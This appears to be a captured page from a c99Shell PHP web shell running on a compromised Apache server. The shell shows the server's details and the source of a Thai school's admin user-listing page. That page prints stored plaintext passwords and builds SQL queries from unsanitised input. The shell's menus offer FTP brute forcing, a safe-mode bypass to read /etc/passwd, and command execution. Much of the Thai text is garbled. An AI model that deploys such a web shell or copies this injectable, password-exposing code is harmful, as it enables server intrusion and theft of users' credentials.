110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage_22222/admin/ drwxr-xr-x Free 52.64 GB of 127.8 GB (41.19%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

<?php
 session_start();
 if (session_is_registered("valid_user"))
 {
include("../include/FunctionDB.php");
include("../include/Function.php");
ConnectDB();
$sql11 = "Select * From user_tb ";
$result11 = mysql_query($sql11) or die("Error".mysql_error());
$rss = mysql_fetch_array($result11);
$strSQL = "SELECT * FROM personal_tb  Where  permision='2' ";
if (! $Page)
$Page = 1;
$Pre_Page = $Page - 1;
$Next_Page = $Page +1;
$Per_Page =50;
$result = mysql_query($strSQL);

$Page_start = ($Per_Page*$Page) - $Per_Page;
$Num_Rows = mysql_num_rows($result);

if( $Num_Rows <= $Per_Page)
   $Num_Pages = 1;
else if (($Num_Rows % $Per_Page) == 0)
       $Num_Pages = ($Num_Rows / $Per_Page);
else
        $Num_Pages = ($Num_Rows / $Per_Page) + 1;
$Num_Pages = (int)$Num_Pages;

if (( $Page > $Num_Pages) || ($Page < 0))
  echo"Page $Page More than $Num_Pages";
$strSQL .=" LIMIT $Page_start,$Per_Page" ;
$result = mysql_query($strSQL); 
///////////////////////////////////////////////////////////////////////////////////
$num = mysql_num_rows( $result );
//$count = 0;
?> 
<html>
<head>
<title>Information List</title>
<link rel="stylesheet" href="../css/style1.css" type="text/css">
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<script language="JavaScript" >
function MM_openBrWindow(theURL,winName,features) { //v2.0
  window.open(theURL,winName,features);
}
//-->
</script>
</head>

<body bgcolor="#FFFFFF">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr> 
    <td><table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" bordercolor="#999999">
        <tr> 
          <td width="20%" height="21" background="../../Image/bard2.jpg"  class="table"> 
            <div align="center"><strong><font size="2" face="Tahoma"><a href="../adminmenu.php" class="d">ЎЕСєЛ№йТЛЕСЎ</a></font></strong></div></td>
          <td width="20%" background="../../Image/bard2.jpg" class="table"> <div align="center"><strong><font size="2" face="Tahoma"><a href="../../logout.php" class="d">Logout</a></font></strong></div></td>
        </tr>
      </table></td>
  </tr>
</table>
<form name="form1" method="post" action="Deluser.php">
  <table width="100%" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#EEEEEE" style="border:1px solid gray">
    <tr bordercolor="#003366" bgcolor="#ABE4AF"> 
      <td colspan="9" align="center"><font color="#000000" size="4" face="Tahoma"><strong>ГТВЄЧиНјЩйгЄй·Сй§ЛБґ</strong></font></td>
    </tr>
    <tr bordercolor="#003366" bgcolor="#E2F5E3"> 
      <td width="20" align="center"><font color="#FF0000" size="2" face="Tahoma"><strong>Еє</strong></font></td>
      <td width="21" align="center"><font color="#003366" size="2" face="Tahoma"><b>No.</b></font></td>
      <td width="263" align="center"><font color="#003366" size="2" face="Tahoma"><strong>ЄЧиН 
        - №ТБКЎШЕ</strong></font></td>
      <td width="153" align="center"><font color="#003366" size="2" face="Tahoma"><b>username</b></font></td>
      <td colspan="2" align="center" bgcolor="#E2F5E3"><font color="#003366" size="2" face="Tahoma"><b>password</b></font></td>
      <td width="202" align="center"><font color="#003366" size="2" face="Tahoma"><strong>Priority</strong></font></td>
      <td width="129" align="center"><font color="#003366" size="2" face="Tahoma"><strong>К¶Т№РЎТГаўйТгЄйГРєє</strong></font></td>
      <td width="46" align="center"><font color="#FF0000" size="2" face="Tahoma"><strong>Еє</strong></font></td>
    </tr>
    <?php
$i = 1;
 while($row = mysql_fetch_array($result))
 {

     if($count==0)
     {
?>
    <tr bgcolor="#F7F7F7" > 
      <td align=center bordercolor="#D1D1D1" > <div align="center"> 
          <input name="checkbox[]" type="checkbox" id="checkbox[]" value="<? echo $row[studentId]?>">
        </div></td>
      <td align=center bordercolor="#D1D1D1" ><strong><font color="#003300" size="2" face="Tahoma"> 
        <?=$i?>
        </font></strong></td>
      <td align=center bordercolor="#DFDFDF" > <div align="left"> 
          <?php
         $Flag = $row["Flag_del"];
         if ($Flag == "1")
         {
          echo"<font color=\"#FF0000\" size=\"2\" face=\"Tahoma\">";
          echo"$row[First_name]&nbsp; $row[studentName] &nbsp;$row[studentLastname]"; 
           echo"</font>";
          }
          else
                   {
          echo"<font color=\"#003300\" size=\"2\" face=\"Tahoma\">";
          echo"$row[student_code]&nbsp; $row[studentName] &nbsp;$row[studentLastname]"; 
           echo"</font>";
          }
          ?></font>
          </div></td>
      <td align=center bordercolor="#DFDFDF" > <div align="left"><font color="#003300" size="2" face="Tahoma"> 
          <? echo"$row[Username]";?> </font></div></td>
      <td width="112" bordercolor="#DFDFDF">
<div align="center" onClick="MM_openBrWindow('FrmEditPwd.php?studentId=<? echo $row[studentId]?>&Username=<? echo $row[Username]?>','Detail','width=400,height=150')"><a href="#"><img src="../../picture/edit.gif" width="15" height="12" border="0" align="absmiddle"></a></div></td>
      <td width="45" bordercolor="#DFDFDF"> <div align="left"><font color="#000000" size="2" face="Tahoma">
        <?php 
           $Teacher_code= $row["Teacher_code"];
           $sql2 = "Select * From user_tb Where Teacher_code='$Teacher_code'";
           $result2= mysql_query($sql2) or die("Error".mysql_error());
           $rss2 = mysql_fetch_array($result2);
            echo "$rss2[PasswordR]";
            ?>
      </font></div></td>
      <td bordercolor="#DFDFDF"> <div align="center"><font color="#000000" size="2" face="Tahoma"> 
          <?php
        $Permision = $row["Permision"] ;
        $sql1 = "Select * From permission_tb Where permision='$Permision'";
        $result1 = mysql_query($sql1) or die("Error".mysql_error());
        $rss = mysql_fetch_array($result1);
        echo "$rss[description]";
       ?>
          </font><font color="#003300" size="2" face="Tahoma"><? echo"$row[Flag_del]";?></font><font color="#000000" size="2" face="Tahoma"> 
          </font></div></td>
      <td bordercolor="#DFDFDF"> <div align="center"> <font size="2" face="Tahoma"> 
          <a href="UpdatePermit.php?Teacher_code=<? echo $row[Teacher_code]?>&amp;&amp;Flag=<? echo $rss2[Flag]?>" class="d" >
          <?php 
            $Teacher_code = $row["Teacher_code"];
            $str = "Select * From user_tb Where Teacher_code='$Teacher_code'";
            $res_p = mysql_query($str) or die("Error".mysql_error());
            $res1 = mysql_fetch_array($res_p);    
            if (!(strcmp("$res1[Flag]","0")))
               {
                echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"> <font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">Н№ШТµ</font>";
                }
                 else     if (!(strcmp("$res1[Flag]","1")))
                        {
                        echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"><font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">Н№ШТµ</font>";
                       }
                else if (!(strcmp("$res1[Flag]","2")))
                 { 
                 echo"<img src=\"../Image/lock.gif\" width=\"10\" height=\"10\" align=\"absmiddle\" border=\"0\">дБиН№ШТµ";
                 }            
            ?>
          </a><a href="UpdatePermit.php?studentId=<? echo $row[studentId]?>&&Flag=<? echo $rss2[Flag]?>" class="d" ></a> </font></div></td>
      <td bordercolor="#DFDFDF"> <div align="center"> 
          <script language="JavaScript">
function Conf<?=$row[studentId];?>0(object) {
    if (confirm("¤ШіµйН§ЎТГЕєўйНБЩЕ [<?php echo " $row[studentId] $row[studentName] $row[studentLastname]"; ?>] ЛГЧНдБи?") == true) {
        return true;
    }
    return false;
}
</script>
          <a href="Deluser2.php?studentId=<?php echo $row[studentId]; ?>"> 
          <img src="../../picture/deletenew.gif" alt=" Delete " width="16" height="19" border="0" onClick="return Conf<?=$row[studentId];?>0(this)"></a></div></td>
    </tr>
    <?
    $count=1;
     }
else
{
?>
    <tr bgcolor="#FFFFFF"> 
      <td align="center" bordercolor="#D1D1D1" > <div align="center"> 
          <input name="checkbox[]" type="checkbox" id="checkbox[]" value="<? echo $row[studentId]?>">
        </div></td>
      <td align="center" bordercolor="#D1D1D1" ><strong><font color="#003300" size="2" face="Tahoma"> 
        <?=$i?>
        </font></strong></td>
      <td align="center" bordercolor="#FFFFFF" > <div align="left"> 
          <?php
         $Flag = $row[Flag_del];
         if (Flag == "1")
         {
          echo"<font color=\"#FF0000\" size=\"2\" face=\"Tahoma\">";
          echo"$row[student_code]&nbsp; $row[studentName] &nbsp;$row[studentLastname]"; 
           echo"</font>";
          }
          else
                   {
          echo"<font color=\"#003300\" size=\"2\" face=\"Tahoma\">";
          echo"$row[studentId]&nbsp; $row[studentName] &nbsp;$row[studentLastname]"; 
           echo"</font>";
          }
          ?>
        </div></td>
      <td height="18" align="center" bordercolor="#FFFFFF" > <div align="left"><font color="#003300" size="2" face="Tahoma"> 
          <? echo"$row[Username]";?> </font></div></td>
      <td bordercolor="#FFFFFF" onClick="MM_openBrWindow('FrmEditPwd.php?studentId=<? echo $row[studentId]?>&Username=<? echo $row[Username]?>','Detail','width=400,height=150')"><div align="center" ><a href="#"><img src="../../picture/edit.gif" width="15" height="12" border="0" align="absmiddle"></a></div></td>
      <td bordercolor="#FFFFFF"> <div align="left"><font color="#000000" size="2" face="Tahoma">
        <?php 
           $Teacher_code= $row["Teacher_code"];
           $sql2 = "Select * From user_tb Where Teacher_code='$Teacher_code'";
           $result2= mysql_query($sql2) or die("Error".mysql_error());
           $rss2 = mysql_fetch_array($result2);
            echo "$rss2[PasswordR]";
            ?>
      </font></div></td>
      <td bordercolor="#FFFFFF"> <div align="center"><font color="#000000" size="2" face="Tahoma"> 
          <?php
        $Permision = $row[Permision] ;
        $sql1 = "Select * From permission_tb Where permision='$Permision'";
        $result1 = mysql_query($sql1) or die("Error".mysql_error());
        $rss = mysql_fetch_array($result1);
        echo "$rss[description]";
       ?>
          </font><font color="#003300" size="2" face="Tahoma"><? echo"$row[Flag_del]";?></font><font color="#000000" size="2" face="Tahoma"> 
          </font></div></td>
      <td bordercolor="#FFFFFF"> <div align="center"> <font size="2" face="Tahoma"> 
          <a href="UpdatePermit.php?Teacher_code=<? echo $row[Teacher_code]?>&amp;&amp;Flag=<? echo $rss2[Flag]?>" class="d" >
          <?php 
            $Teacher_code = $row["Teacher_code"];
            $str = "Select * From user_tb Where Teacher_code='$Teacher_code'";
            $res_p = mysql_query($str) or die("Error".mysql_error());
            $res1 = mysql_fetch_array($res_p);    
            if (!(strcmp("$res1[Flag]","0")))
               {
                echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"> <font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">Н№ШТµ</font>";
                }
                 else     if (!(strcmp("$res1[Flag]","1")))
                        {
                        echo"<img src=\"../Image/unlock.gif\" width=\"13\" height=\"11\" align=\"absmiddle\" border=\"0\"><font face=\"Tahoma\" size=\"2\" color=\"#0000FF\">Н№ШТµ</font>";
                       }
                else if (!(strcmp("$res1[Flag]","2")))
                 { 
                 echo"<img src=\"../Image/lock.gif\" width=\"10\" height=\"10\" align=\"absmiddle\" border=\"0\">дБиН№ШТµ";
                 }            
            ?>
          </a><a href="UpdatePermit.php?studentId=<? echo $row[studentId]?>&&Flag=<? echo $rss2[Flag]?>" class="d" ></a><a href="UpdatePermit.php?studentId=<? echo $row[studentId]?>&&Flag=<? echo $rss2[Flag]?>" class="d" ></a><a href="UpdatePermit.php?studentId=<? echo $row[studentId]?>&&Flag_del=<? echo $row[Flag_del]?>" class="d" > 
          </a><a href="UpdatePermit.php?studentId=<? echo $row[studentId]?>" > 
          </a> </font></div></td>
      <td bordercolor="#FFFFFF"> <div align="center"> 
          <script language="JavaScript">
function Conf<?=$row[studentId];?>0(object) {
    if (confirm("¤ШіµйН§ЎТГЕєўйНБЩЕ [<?php echo " $row[studentId] $row[studentName] $row[studentLastname]"; ?>] ЛГЧНдБи?") == true) {
        return true;
    }
    return false;
}
</script>
          <a href="Deluser2.php?studentId=<?php echo $row[studentId]; ?>"> 
          <img src="../../picture/deletenew.gif" alt=" Delete " width="16" height="19" border="0" onClick="return Conf<?=$row[studentId];?>0(this)"></a></div></td>
    </tr>
    <?
$count=0;
}
$i++;
 }    
CloseDB();
?>
    <tr bgcolor="#E2F5E3"> 
      <td colspan="9" align="center"> <input type="submit" name="Submit" value="   Еє   "></td>
    <tr bgcolor="#ABE4AF"> 
      <td colspan="9" align="center"> <div align="center"><font color="#000000" size="2" face="Tahoma">·Сй§ЛБґ</font><font color="#003399" size="2" face="Tahoma"> 
          <? echo $num ?> </font><font color="#000000" size="2" face="Tahoma">ГТВЎТГ&nbsp;</font> 
        </div></td>
  </table>
</form>
<table width="100%" border="0" align="center" cellpadding="0" cellspacing="0" bordercolor="#99CCFF">
  <tr> 
    <td align="right" class="Tahoma11"> 
      <div align="center"><font color="#FFFFFF"> <font color="#FFFFFF" size="3" face="MS Sans Serif"><strong> 
        <font color="#0033CC" size="2" face="Tahoma">&nbsp;<?php echo $Num_Pages;?></font></strong></font><font color="#0033CC" size="2" face="Tahoma"><strong>&nbsp;Л№йТ</strong></font> 
        <font color="#0033CC" size="2" face="Tahoma"><strong> 
        <?php
if ($Pre_Page)
   echo"<a href=\"$PHP_SELF?Page=$Pre_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>&lt;&lt; Previus</b> </font></a>";

   for($i=1;$i<=$Num_Pages;$i++)
   {
    if($i != $Page)
         echo" [<a href=\"$PHP_SELF?Page=$i\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b>$i</b></font></a>] ";
    else
        echo"<b>$i</b>";
   }
if($Page != $Num_Pages)
 echo"<a href=\"$PHP_SELF?Page=$Next_Page\" class=\"PageLink\"><font =\"Ms San serif\" size=\"2\"><b> Next &gt;&gt;</b> </font></a>";
 ?>
        </strong></font> </font> </div></td>
  </tr>
</table>
<p align="left"><font color="#FF0000" size="2" face="Tahoma">јЩйґЩбЕГРєєБХКФ·ёФмг№ЎТГЕєГТВЄЧиНг№ГТВЎТГдґ</font><font color="#FF0000">й</font></p>
<p align="center">&nbsp;</p>
</body>
</html>
<?php 
    }
else
{
    echo"<body bgcolor=\"#CCCCCC\">";
     echo"<meta http-equiv=\"refresh\" content=\"3;URL=../logout.php\" target=\"mainFrame\">\n";
     echo"<center>";
      echo"<br><br><br><b><font face=\"Tahoma\" size=\"4\" color=\"#FF0000\">Please Login</font> </b><br>";
      echo"<br><br><font face=\"Tahoma\" size=\"10\" color=\"#000000\"> ERROR 404 PERMISION DENY</font><br>";
      echo"<br><font face=\"Tahoma\" size=\"4\" color=\"#000000\"> ¤ШідБиБХКФ·ёмгЄй§Т№</font>";
      echo"</center>";
      echo"</body>";
} 
?>
:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:
:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/
:: Command execute ::
Enter:	Select: